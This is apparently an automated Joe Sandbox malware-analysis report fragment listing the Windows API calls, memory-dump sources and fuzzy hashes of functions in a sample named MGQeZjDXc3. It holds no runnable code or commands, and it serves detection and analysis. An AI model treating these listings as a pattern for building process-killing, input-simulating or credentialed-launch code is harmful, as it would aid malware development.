                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                • String ID:
                                                • API String ID: 3311875123-0
                                                • Opcode ID: c2e012617c5584cad6f8f2611ca8bd878b7d7d78e903aff1e0479f363d1149dc
                                                • Instruction ID: 57e5c02d6d98d7caa535160b358c348642eca5a18dec51124cc074bc1b63f81e
                                                • Opcode Fuzzy Hash: c2e012617c5584cad6f8f2611ca8bd878b7d7d78e903aff1e0479f363d1149dc
                                                • Instruction Fuzzy Hash: 5551F470601389DFDF20CF6AD988BAEBBF8BF88318F244159E4159B291D7B09945CB51
                                                APIs
                                                • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00B3DC00), ref: 00AF8E7C
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00AF8E89
                                                • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00AF8EAD
                                                • #16.WSOCK32(?,?,00000000,00000000), ref: 00AF8EC5
                                                • _strlen.LIBCMT ref: 00AF8EF7
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00AF8F6A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_strlenselect
                                                • String ID:
                                                • API String ID: 2217125717-0
                                                • Opcode ID: a975ff87a9481ebfb50b588d12313a533fd775866c3abbf0bf895afdd5662824
                                                • Instruction ID: 5a078698c4da2c697bbe17af0b8aedb34523f8f1c0fad0d00dffae44790ead4a
                                                • Opcode Fuzzy Hash: a975ff87a9481ebfb50b588d12313a533fd775866c3abbf0bf895afdd5662824
                                                • Instruction Fuzzy Hash: 04418F71500208AFDB14EBA4CE85EEEB7B9AF59310F104669F61A972D1DF34EE04CB60
                                                APIs
                                                  • Part of subcall function 00ABB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ABB35F
                                                • BeginPaint.USER32(?,?,?), ref: 00ABAC2A
                                                • GetWindowRect.USER32(?,?), ref: 00ABAC8E
                                                • ScreenToClient.USER32(?,?), ref: 00ABACAB
                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00ABACBC
                                                • EndPaint.USER32(?,?,?,?,?), ref: 00ABAD06
                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00B1E673
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                • String ID:
                                                • API String ID: 2592858361-0
                                                • Opcode ID: f5d93640f0abb60b44e5ed0d136ce067e7f1c60f15bedbae22266008bb7368f2
                                                • Instruction ID: 4c8b68b134b05f1fe9d2b69788ae468c181226b0982495182593c756e77a0689
                                                • Opcode Fuzzy Hash: f5d93640f0abb60b44e5ed0d136ce067e7f1c60f15bedbae22266008bb7368f2
                                                • Instruction Fuzzy Hash: 434191711043009FC711DF68DC84FB67BFCEB69320F180669F9A5872A2CB759985DB62
                                                APIs
                                                • ShowWindow.USER32(00B61628,00000000,00B61628,00000000,00000000,00B61628,?,00B1DC5D,00000000,?,00000000,00000000,00000000,?,00B1DAD1,00000004), ref: 00B0E40B
                                                • EnableWindow.USER32(00000000,00000000), ref: 00B0E42F
                                                • ShowWindow.USER32(00B61628,00000000), ref: 00B0E48F
                                                • ShowWindow.USER32(00000000,00000004), ref: 00B0E4A1
                                                • EnableWindow.USER32(00000000,00000001), ref: 00B0E4C5
                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00B0E4E8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$Show$Enable$MessageSend
                                                • String ID:
                                                • API String ID: 642888154-0
                                                • Opcode ID: 9a84e90742c5e2d74e7dfadfbd78dadca00fde6e9d62abdd4e0ddeb5c532bf82
                                                • Instruction ID: 3bc4fa0d66cff084c957f7e3adba65d55c4e18041ca0d03da5c45765ccdaaf89
                                                • Opcode Fuzzy Hash: 9a84e90742c5e2d74e7dfadfbd78dadca00fde6e9d62abdd4e0ddeb5c532bf82
                                                • Instruction Fuzzy Hash: D3410834601141AFDB26CF24C499B987FE1FF09704F5889A9EA698F2E2C735E842CB51
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 00AE98D1
                                                  • Part of subcall function 00ABF4EA: std::exception::exception.LIBCMT ref: 00ABF51E
                                                  • Part of subcall function 00ABF4EA: __CxxThrowException@8.LIBCMT ref: 00ABF533
                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00AE9908
                                                • EnterCriticalSection.KERNEL32(?), ref: 00AE9924
                                                • LeaveCriticalSection.KERNEL32(?), ref: 00AE999E
                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00AE99B3
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00AE99D2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                • String ID:
                                                • API String ID: 2537439066-0
                                                • Opcode ID: 40f0b160e4c8a8037881c97786374fddeb0384b5523d9df1193aa7485f083983
                                                • Instruction ID: 2c76f247f9a0cad654e98245ea20815f48218fc2e913dab0701b035754fb1610
                                                • Opcode Fuzzy Hash: 40f0b160e4c8a8037881c97786374fddeb0384b5523d9df1193aa7485f083983
                                                • Instruction Fuzzy Hash: 54315E31900205EFDB10EFA5DD85AABBBB8FF45310F1480A9E905AB256DB70DE15CBA4
                                                APIs
                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,00AF77F4,?,?,00000000,00000001), ref: 00AF9B53
                                                  • Part of subcall function 00AF6544: GetWindowRect.USER32(?,?), ref: 00AF6557
                                                • GetDesktopWindow.USER32 ref: 00AF9B7D
                                                • GetWindowRect.USER32(00000000), ref: 00AF9B84
                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00AF9BB6
                                                  • Part of subcall function 00AE7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AE7AD0
                                                • GetCursorPos.USER32(?), ref: 00AF9BE2
                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00AF9C44
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                • String ID:
                                                • API String ID: 4137160315-0
                                                • Opcode ID: b995b0673ec42af300d65ae2f9c0834607c9321cffeb7eec7e36790fcf6bc98d
                                                • Instruction ID: 70977ff53fbaa802cc9d1044c6c9906d43d3fefa7cb80dbce83e826f35728a21
                                                • Opcode Fuzzy Hash: b995b0673ec42af300d65ae2f9c0834607c9321cffeb7eec7e36790fcf6bc98d
                                                • Instruction Fuzzy Hash: 5B31C172504309ABD720DF54DC49FABB7E9FF88314F00092AF689D7191DA71E945CB91
                                                APIs
                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00ADAFAE
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00ADAFB5
                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00ADAFC4
                                                • CloseHandle.KERNEL32(00000004), ref: 00ADAFCF
                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00ADAFFE
                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00ADB012
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                • String ID:
                                                • API String ID: 1413079979-0
                                                • Opcode ID: e73260a9a7b575d565f651be2bc2143b4ccc81c8a16dafd1f854501f2a0b83b5
                                                • Instruction ID: 6268e7e83b5818041d82f56e57213a2d676b98938420a7cd7d09e9d517ce3859
                                                • Opcode Fuzzy Hash: e73260a9a7b575d565f651be2bc2143b4ccc81c8a16dafd1f854501f2a0b83b5
                                                • Instruction Fuzzy Hash: 52215B72100209AFDF128FA4DD09FEE7BB9EF48314F148056FA02A2261C7769D65EB61
                                                APIs
                                                  • Part of subcall function 00ABAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00ABAFE3
                                                  • Part of subcall function 00ABAF83: SelectObject.GDI32(?,00000000), ref: 00ABAFF2
                                                  • Part of subcall function 00ABAF83: BeginPath.GDI32(?), ref: 00ABB009
                                                  • Part of subcall function 00ABAF83: SelectObject.GDI32(?,00000000), ref: 00ABB033
                                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00B0EC20
                                                • LineTo.GDI32(00000000,00000003,?), ref: 00B0EC34
                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B0EC42
                                                • LineTo.GDI32(00000000,00000000,?), ref: 00B0EC52
                                                • EndPath.GDI32(00000000), ref: 00B0EC62
                                                • StrokePath.GDI32(00000000), ref: 00B0EC72
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                • String ID:
                                                • API String ID: 43455801-0
                                                • Opcode ID: d6ac8e13b63938194cb124cdfd9f76d57381b0ae4e82e453f3da106c44ce5b35
                                                • Instruction ID: 846ffa9760186a8aa6166dee216559fc7911e9ac76abc0d0b9296694ce0c695c
                                                • Opcode Fuzzy Hash: d6ac8e13b63938194cb124cdfd9f76d57381b0ae4e82e453f3da106c44ce5b35
                                                • Instruction Fuzzy Hash: 98110976000149BFEB129F94DD88EEA7F6DEB08350F048512FA189A1B0DB719D56DBA0
                                                APIs
                                                • GetDC.USER32(00000000), ref: 00ADE1C0
                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00ADE1D1
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00ADE1D8
                                                • ReleaseDC.USER32(00000000,00000000), ref: 00ADE1E0
                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00ADE1F7
                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 00ADE209
                                                  • Part of subcall function 00AD9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00AD9A05,00000000,00000000,?,00AD9DDB), ref: 00ADA53A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CapsDevice$ExceptionRaiseRelease
                                                • String ID:
                                                • API String ID: 603618608-0
                                                • Opcode ID: e63df3678b467a1023535703ec97103a76b2c50e67a7f87733804604260c97e0
                                                • Instruction ID: ccf19fb301c9011e8dfee8f4ff7d53c9192c74545ff93b7ddbc5ecb7ec54df0b
                                                • Opcode Fuzzy Hash: e63df3678b467a1023535703ec97103a76b2c50e67a7f87733804604260c97e0
                                                • Instruction Fuzzy Hash: B10184B5A00214BFEB109BA58C45B5EBFB9EB48351F004066FA09AB390DA709D01CB60
                                                APIs
                                                • __init_pointers.LIBCMT ref: 00AC7B47
                                                  • Part of subcall function 00AC123A: __initp_misc_winsig.LIBCMT ref: 00AC125E
                                                  • Part of subcall function 00AC123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00AC7F51
                                                  • Part of subcall function 00AC123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00AC7F65
                                                  • Part of subcall function 00AC123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00AC7F78
                                                  • Part of subcall function 00AC123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00AC7F8B
                                                  • Part of subcall function 00AC123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00AC7F9E
                                                  • Part of subcall function 00AC123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00AC7FB1
                                                  • Part of subcall function 00AC123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00AC7FC4
                                                  • Part of subcall function 00AC123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00AC7FD7
                                                  • Part of subcall function 00AC123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00AC7FEA
                                                  • Part of subcall function 00AC123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00AC7FFD
                                                  • Part of subcall function 00AC123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00AC8010
                                                  • Part of subcall function 00AC123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00AC8023
                                                  • Part of subcall function 00AC123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00AC8036
                                                  • Part of subcall function 00AC123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00AC8049
                                                  • Part of subcall function 00AC123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00AC805C
                                                  • Part of subcall function 00AC123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00AC806F
                                                • __mtinitlocks.LIBCMT ref: 00AC7B4C
                                                  • Part of subcall function 00AC7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00B5AC68,00000FA0,?,?,00AC7B51,00AC5E77,00B56C70,00000014), ref: 00AC7E41
                                                • __mtterm.LIBCMT ref: 00AC7B55
                                                  • Part of subcall function 00AC7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00AC7B5A,00AC5E77,00B56C70,00000014), ref: 00AC7D3F
                                                  • Part of subcall function 00AC7BBD: _free.LIBCMT ref: 00AC7D46
                                                  • Part of subcall function 00AC7BBD: DeleteCriticalSection.KERNEL32(00B5AC68,?,?,00AC7B5A,00AC5E77,00B56C70,00000014), ref: 00AC7D68
                                                • __calloc_crt.LIBCMT ref: 00AC7B7A
                                                • GetCurrentThreadId.KERNEL32 ref: 00AC7BA3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                • String ID:
                                                • API String ID: 2942034483-0
                                                • Opcode ID: 871de19f9d7a0cc8aed116bf173a4c15fcac383287f5a9bbe1c7141f0e14501b
                                                • Instruction ID: 12c7bb719aadc4d922a27b9b87a27d7c6febea29b4f3a1a91b8013473f0b184a
                                                • Opcode Fuzzy Hash: 871de19f9d7a0cc8aed116bf173a4c15fcac383287f5a9bbe1c7141f0e14501b
                                                • Instruction Fuzzy Hash: 65F0903250D31219EA2977747E07F4E26C49F02731B2306EDF962D61D2FF208C414D60
                                                APIs
                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AA281D
                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00AA2825
                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AA2830
                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AA283B
                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00AA2843
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AA284B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Virtual
                                                • String ID:
                                                • API String ID: 4278518827-0
                                                • Opcode ID: 8b2c3233ff4dbe72810e420367dde8a6327306b5ec5e0bc3be3503c08937596e
                                                • Instruction ID: 602d0d15fbd1a7d1de21b4661bbe5bfed8fbda538db85308fadf1caf44232ff1
                                                • Opcode Fuzzy Hash: 8b2c3233ff4dbe72810e420367dde8a6327306b5ec5e0bc3be3503c08937596e
                                                • Instruction Fuzzy Hash: 6C0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                • String ID:
                                                • API String ID: 1423608774-0
                                                • Opcode ID: 1805097f4570ba95402901e54d0a32d694e3f7815c4611ef9a1ef40d4a5ae71a
                                                • Instruction ID: 41f0ac0b22e83f434de6a65c6a13cd976b263d04ccd63810fa3191d30697247b
                                                • Opcode Fuzzy Hash: 1805097f4570ba95402901e54d0a32d694e3f7815c4611ef9a1ef40d4a5ae71a
                                                • Instruction Fuzzy Hash: C001A432102312EBD7295B59ED48EEB7769FF88741B141439F503930A0DF749802DB60
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00AE7C07
                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00AE7C1D
                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00AE7C2C
                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AE7C3B
                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AE7C45
                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AE7C4C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                • String ID:
                                                • API String ID: 839392675-0
                                                • Opcode ID: 1076229cc108f1cd8d51c2e3f8e9cdc48a5cc4e163545cfb6a68f1277746b21e
                                                • Instruction ID: 2239a50ad43678602a2ddc9b6ed4c8c541cb44f490d2d288152df19d1fc39d9d
                                                • Opcode Fuzzy Hash: 1076229cc108f1cd8d51c2e3f8e9cdc48a5cc4e163545cfb6a68f1277746b21e
                                                • Instruction Fuzzy Hash: 63F03A72241198BBE7315B929C0EEEF7B7CEFC6B12F000018FA01A2051DBA05A42C6B5
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,?), ref: 00AE9A33
                                                • EnterCriticalSection.KERNEL32(?,?,?,?,00B15DEE,?,?,?,?,?,00AAED63), ref: 00AE9A44
                                                • TerminateThread.KERNEL32(?,000001F6,?,?,?,00B15DEE,?,?,?,?,?,00AAED63), ref: 00AE9A51
                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00B15DEE,?,?,?,?,?,00AAED63), ref: 00AE9A5E
                                                  • Part of subcall function 00AE93D1: CloseHandle.KERNEL32(?,?,00AE9A6B,?,?,?,00B15DEE,?,?,?,?,?,00AAED63), ref: 00AE93DB
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00AE9A71
                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,00B15DEE,?,?,?,?,?,00AAED63), ref: 00AE9A78
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                • String ID:
                                                • API String ID: 3495660284-0
                                                • Opcode ID: ed7f2ad72612857c311b2cc5c0da76e4b6decda2cccd90f34f8c5c4e00843414
                                                • Instruction ID: 34a3a2130023624febd9a1c34d2cc2023faf6e88b7409a2ec564c80ff3201215
                                                • Opcode Fuzzy Hash: ed7f2ad72612857c311b2cc5c0da76e4b6decda2cccd90f34f8c5c4e00843414
